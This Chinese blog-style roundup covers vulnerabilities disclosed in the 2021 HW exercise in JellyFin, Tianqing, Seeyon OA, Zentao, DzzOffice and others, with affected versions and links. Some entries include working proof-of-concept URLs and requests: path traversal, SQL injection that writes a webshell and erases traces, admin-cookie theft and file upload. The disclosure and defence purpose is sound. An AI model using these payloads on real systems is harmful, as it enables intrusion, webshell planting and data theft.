前言

　　2021的HW已经开始，在这期间会有许多的漏洞被披露出来，在本文将进行持续更新。

　　CVE-2021-21402 JellyFin 任意文件读取

　　漏洞简介

　　JellyFin的Windows端服务器不会对特定路径进行鉴权，可以导致攻击者利用Windows上的路径穿越来读取Windows服务器上的任意文件。本漏洞于2021年3月28日在最近版本的10.7.1中被修复。

　　影响版本

　　JellyFin <= 10.7.0

　　漏洞复现

　　以下是漏洞复现结果。

　　

 

　　可以通过访问

　　http:///Audio/anything/hls/<文件路径>/stream.mp3/

　　读取任意文件。

　　帆软 getshell FineReport V9 任意命令执行

　　漏洞简介

　　近日在网络上流传帆软的FineReport存在未认证的命令执行漏洞，经过官方的核实及测试，发现本漏洞并非0day，并不影响v10.0的版本。官方厂商已在去年发布相关修复。

　　影响版本

　　FineReport < v10.0

　　相关链接

　　https://forum.butian.net/share/57

　　和信创天云桌面命令执行

　　漏洞简介

　　由于服务端不会对上传的文件进行类型审查和权限审查，导致任意攻击者可以上传文件，严重可导致远程命令执行。

　　漏洞复现

　　首先通过Upload/upload_file.php上传文件，上传后的文件可以在l参数的目录下找到。例如上图的请求，上传后的文件会被保存到Upload/1/asd.php。

　　

 

　　例如上图的请求，上传后的文件会被保存到Upload/1/asd.php。

　　

 

　　默安蜜罐管理平台未授权问漏洞

　　漏洞简介

　　由于蜜罐管理平台鉴权不完善，可导致攻击者在未授权的情况下访问管理页面。默安官方发表通告并表示幻阵管理平台存在于内网网址，攻击者难以进行访问，且尽管可以访问也只能让幻阵执行ping指令，不会造成任何安全隐患。

　　相关链接

　　https://mp.weixin.qq.com/s/LV460_N1-EsQUM8YhM5nuw

　　天擎越权访问

　　漏洞简介

　　在Web登录界面且未登录的情况下会显示提示信息，并且会涉及用户组织，功能模块授权过期时间等。天擎官方发表声明并表示Web接口为正常接口，不存在漏洞。参考: https://forum.butian.net/share/58

　　天擎-前台sql注入

　　漏洞简介

　　可以让攻击者泄露服务端数据库，同时由于安装服务的用户极有可能拥有root权限，所以也可以进行webshell写入并达成命令执行。但本漏洞是内部一直问题，并且在2020年护网前的版本已经修复。

　　漏洞利用

　　目前公开的PoC如下:

　　https:///api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('');copy O(T) to '<目标文件写入路径>';drop table O;--

　　本段PoC将首先创建新的数据库表，后将数据库内容更名为webshell的目标名，最后删除表清理痕迹。

　　致远OA-ajax.do上传文件漏洞

　　漏洞简介

　　可通过访问

　　http:///seeyon/thirdpartyController.do.css/..;/ajax.do

　　来测试是否有漏洞，如漏洞存在，则会出现java.lang.NullPointerException:null字样。

　　漏洞利用

　　首先是通过精心构造的请求来获取到管理员的cookie，流出POC如下:

　　targeturl=orgurl+'seeyon/thirdpartyController.do'

　　post='method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1'

　　request = SendRequest(targeturl,post)

　　response = request.send()

　　rsp = ""

　　if response and response.code == 200 and 'set-cookie' in str(response.headers).lower():

　　cookies = get_response_cookies(response.headers)

　　随后可以通过对目标路径发送POST请求和制作好的压缩文件即可达成文件上传。流出的PoC请求如下:

　　POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1

　　Host: 127.0.0.1

　　Connection: close

　　Cache-Control: max-age=0

　　Upgrade-Insecure-Requests: 1

　　User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52

　　Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

　　Sec-Fetch-Site: none

　　Sec-Fetch-Mode: navigate

　　Sec-Fetch-User: ?1

　　Sec-Fetch-Dest: document

　　Accept-Encoding: gzip, deflate

　　Accept-Language: zh-CN,zh;q=0.9

　　loginPageURL=; login_locale=zh_CN;

　　Content-Type: application/x-www-form-urlencoded

　　managerMethod=validate&arguments=<请求数据>

　　若服务器没有返回“被迫下线”等字样，则证明上传成功。

　　相关链接

　　https://planet.vulbox.com/detail/412

　　WPS 0 Day RCE

　　漏洞简介

　　攻击者在通过恶意链接可以让WPS的内置浏览器进行沙箱逃逸和并令执行。请勿下载打开来路不明的WPS文件。

　　相关链接

　　https://planet.vulbox.com/detail/421

　　微软Exchange服务器 0 day命令执行漏洞

　　漏洞说明

　　攻击者可以通过把Exchange的认证绕过漏洞和权限提升漏洞结合在一起，完成对远程Exchange服务器的远程命令执行。详细信息将后续补充。

　　天融信DLP未授权越权

　　漏洞信息

　　管理界面可以通过未授权访问，并且在管理界面里更改密码时不会对原密码进行检查，所以攻击者可以通过未授权访问管理界面，并且对管理员账号进行随意更改。

　　DZZOffice远程命令执行

　　漏洞信息

　　由于DzzOffice中一部分代码是抄自Discuz， 而Discuz中存在随机数问题。弱随机导致DzzOffice的authkey变量在理论上可以被爆破出来，但实际操作难度较大。获得authkey之后可以利用authkey对上传文件数据进行加密，而后可以向/core/api/wopi/index.php发送POST请求和加密过后的文件数据进行文件上传。上传成功后可以访问上传的文件地址，并执行命令。

　　禅道11.6 多个漏洞

　　漏洞信息

　　所有的漏洞都需要至少普通用户的权限。禅道采取了新的路径解析方法，具体解析方式为getModel---<参数名字>=<参数的值>。而攻击者可以利用其中的一些过滤不当的API来进行SQL注入，文件读写最终可达成远程命令执行。

　　漏洞复现

　　首先是SQL注入，在禅道的api-getModel-api-sql-sql端点中，攻击者可以通过向本端点输入任意SQL语句从而达成SQL注入。

　　

 

　　其次是文件读写，api-getModel-file-parseCSV-fileName可以让攻击者读取任意文件。

　　

 

　　api-getModel-editor-save-filePath可以让攻击者通过发送POST请求上传任意文件。

　　

 

　　而在本地运行禅道机器上可以找到相应文件。

　　

 

　　相关链接

　　https://www.jianshu.com/p/62bb128ecbdb

　　https://xz.aliyun.com/t/8066